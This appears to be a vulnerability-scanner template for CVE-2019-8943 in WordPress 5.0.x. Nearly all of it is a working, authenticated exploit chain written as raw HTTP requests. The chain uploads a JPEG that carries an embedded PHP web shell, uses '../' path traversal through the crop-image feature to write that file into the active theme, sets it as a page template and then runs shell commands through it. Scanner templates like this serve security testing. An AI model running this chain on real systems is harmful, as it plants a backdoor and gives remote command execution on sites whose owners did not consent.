id: CVE-2019-8943 info: name: WordPress Core 5.0.0 - Crop-image Shell Upload author: sttlr severity: medium description: | WordPress through 5.0.3 allows Path Traversal in wp_crop_image(). An attacker (who has privileges to crop an image) can write the output image to an arbitrary directory via a filename containing two image extensions and ../ sequences, such as a filename ending with the .jpg?/../../file.jpg substring. reference: - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/ - http://packetstormsecurity.com/files/152396/WordPress-5.0.0-crop-image-Shell-Upload.html - http://packetstormsecurity.com/files/161213/WordPress-5.0.0-Remote-Code-Execution.html - http://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce - https://tryhackme.com/r/room/blog classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N cvss-score: 6.5 cve-id: CVE-2019-8943 cwe-id: CWE-22 epss-score: 0.92778 epss-percentile: 0.99097 cpe: cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:* metadata: verified: true vendor: wordpress product: wordpress shodan-query: - http.component:"wordpress" - cpe:"cpe:2.3:a:wordpress:wordpress" fofa-query: body="oembed" && body="wp-" tags: cve,cve2019,wordpress,rce,intrusive,authenticated,packetstorm,wp-theme variables: image_filename: "{{rand_text_alpha(10)}}" string: "{{to_lower(rand_text_alpha(5))}}" flow: http(1) && http(2) && (http(3) || http(4)) && http(5) && http(6) && http(7) && http(8) && http(9) && http(10) && http(11) && http(12) && http(13) && http(14) && http(15) && http(16) http: - raw: - | GET /wp-login.php HTTP/1.1 Host: {{Hostname}} matchers: - type: word words: - "WordPress" - '/wp-login.php?action=lostpassword">Lost your password?' - '
' condition: or internal: true - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Login matchers: - type: dsl dsl: - 'contains_all(header,"wordpress_logged_in","/wp-admin")' - 'status_code == 302' condition: and internal: true - raw: - | GET /wp-content/themes/{{theme_name}}/style.css HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "status_code == 200" - "len(body) > 0" - "content_type == 'text/css'" condition: and internal: true - raw: - | GET / HTTP/1.1 Host: {{Hostname}} extractors: - type: regex name: theme_name group: 1 regex: - "/wp-content/themes/([^/]+)/" internal: true - raw: - | GET /wp-admin/media-new.php HTTP/1.1 Host: {{Hostname}} extractors: - type: xpath name: wpnonce attribute: value xpath: - "//input[@id='_wpnonce'][1]" internal: true - raw: - | POST /wp-admin/async-upload.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=rexvfybxrhgfrfrjv --rexvfybxrhgfrfrjv Content-Disposition: form-data; name="name" {{image_filename}}.jpg --rexvfybxrhgfrfrjv Content-Disposition: form-data; name="action" upload-attachment --rexvfybxrhgfrfrjv Content-Disposition: form-data; name="_wpnonce" {{wpnonce}} --rexvfybxrhgfrfrjv Content-Disposition: form-data; name="async-upload"; filename="{{image_filename}}.jpg" Content-Type: image/jpeg {{hex_decode("ffd8ffe000104a46494600010101006000600000ffed003850686f746f73686f7020332e30003842494d040400000000001c1c027400103c3f3d60245f4745545b305d603b3f3e1c020000020004fffe003b43524541544f523a2067642d6a7065672076312e3020287573696e6720494a47204a50454720763830292c207175616c697479203d2038320affdb0043000604040504040605050506060607090e0909080809120d0d0a0e1512161615121414171a211c17181f1914141d271d1f2223252525161c292c28242b21242524ffdb00430106060609080911090911241814182424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424242424ffc000110800c0010603012200021101031101ffc4001f0000010501010101010100000000000000000102030405060708090a0bffc400b5100002010303020403050504040000017d01020300041105122131410613516107227114328191a1082342b1c11552d1f02433627282090a161718191a25262728292a3435363738393a434445464748494a535455565758595a636465666768696a737475767778797a838485868788898a92939495969798999aa2a3a4a5a6a7a8a9aab2b3b4b5b6b7b8b9bac2c3c4c5c6c7c8c9cad2d3d4d5d6d7d8d9dae1e2e3e4e5e6e7e8e9eaf1f2f3f4f5f6f7f8f9faffc4001f0100030101010101010101010000000000000102030405060708090a0bffc400b51100020102040403040705040400010277000102031104052131061241510761711322328108144291a1b1c109233352f0156272d10a162434e125f11718191a262728292a35363738393a434445464748494a535455565758595a636465666768696a737475767778797a82838485868788898a92939495969798999aa2a3a4a5a6a7a8a9aab2b3b4b5b6b7b8b9bac2c3c4c5c6c7c8c9cad2d3d4d5d6d7d8d9dae2e3e4e5e6e7e8e9eaf2f3f4f5f6f7f8f9faffda000c03010002110311003f003c3f3d60245f4745545b305d603b3f3e")}} --rexvfybxrhgfrfrjv-- extractors: - type: json part: body name: image_id json: - ".data.id" internal: true - type: json part: body name: update_nonce json: - ".data.nonces.update" internal: true - type: json part: body name: filename json: - ".data.filename" internal: true - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=query-attachments&post_id=0&query%5bitem%5d=43&query%5borderby%5d=date&query%5border%5d=DESC&query%5bposts_per_page%5d=40&query%5bpaged%5d=1 extractors: - type: json part: body name: ajax_nonce json: - ".data[0].nonces.edit" internal: true - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=image-editor&_ajax_nonce={{ajax_nonce}}&postid={{image_id}}&history=%5b%7b%22c%22%3a%7b%22x%22%3a0%2c%22y%22%3a0%2c%22w%22%3a400%2c%22h%22%3a300%7d%7d%5d&target=all&context=&do=save extractors: - type: regex name: image_filename part: body group: 1 regex: - '\/([^\/]+-e\d+)-' internal: true - raw: - | POST /wp-admin/post.php?post={{image_id}}&action=edit HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded extractors: - type: xpath name: wpnonce2 attribute: value xpath: - "//input[@id='_wpnonce'][1]" internal: true - raw: - | POST /wp-admin/post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _wpnonce={{wpnonce2}}&action=editpost&post_ID={{image_id}}&meta_input%5b_wp_attached_file%5d={{date_time('%Y/%M')}}/{{image_filename}}.jpg%3f/x matchers: - type: status status: - 302 internal: true - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=crop-image&_ajax_nonce={{ajax_nonce}}&id={{image_id}}&cropDetails%5bx1%5d=0&cropDetails%5by1%5d=0&cropDetails%5bwidth%5d=400&cropDetails%5bheight%5d=300&cropDetails%5bdst_width%5d=400&cropDetails%5bdst_height%5d=300 extractors: - type: json part: body json: - ".data.filename" internal: true - raw: - | POST /wp-admin/post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _wpnonce={{wpnonce2}}&action=editpost&post_ID={{image_id}}&meta_input%5b_wp_attached_file%5d={{date_time('%Y/%M')}}/{{image_filename}}.jpg%3f/../../../../themes/{{theme_name}}/{{randstr}} matchers: - type: status status: - 302 internal: true - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=crop-image&_ajax_nonce={{ajax_nonce}}&id={{image_id}}&cropDetails%5bx1%5d=0&cropDetails%5by1%5d=0&cropDetails%5bwidth%5d=400&cropDetails%5bheight%5d=300&cropDetails%5bdst_width%5d=400&cropDetails%5bdst_height%5d=300 extractors: - type: json part: body name: cropped_image_filename json: - ".data.filename" internal: true - raw: - | POST /wp-admin/post-new.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded extractors: - type: xpath name: wpnonce3 attribute: value xpath: - "//input[@id='_wpnonce'][1]" internal: true - type: regex name: post_id part: body group: 1 regex: - '"post":{"id":(\w+),' internal: true - raw: - | POST /wp-admin/post.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded _wpnonce={{wpnonce3}}&action=editpost&post_ID={{post_id}}&post_title={{rand_text_alpha(10)}}&post_name={{rand_text_alpha(10)}}&meta_input%5b_wp_page_template%5d=cropped-{{randstr}}.jpg matchers: - type: status status: - 302 internal: true - method: GET path: - "{{BaseURL}}/?p={{post_id}}&0=echo+{{base64(string)}}|base64+-d" - "{{BaseURL}}/?p={{post_id}}&0=type+C:\\windows\\win.ini" - "{{BaseURL}}/?p={{post_id}}&0=type+..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini" stop-at-first-match: true matchers: - type: word part: body words: - "{{string}}" - "for 16-bit app support" condition: or # digest: 4a0a00473045022100e9db47e994dd66ff6b2e79bac165e00a988426661e2a65a7fe5a33176d26b54a02206a694c28360feac6581fa6ac03dc8bc1fd55a22e116e72e6f234a2f8104ff1b5:922c64590222798bb761d5b6d8e72950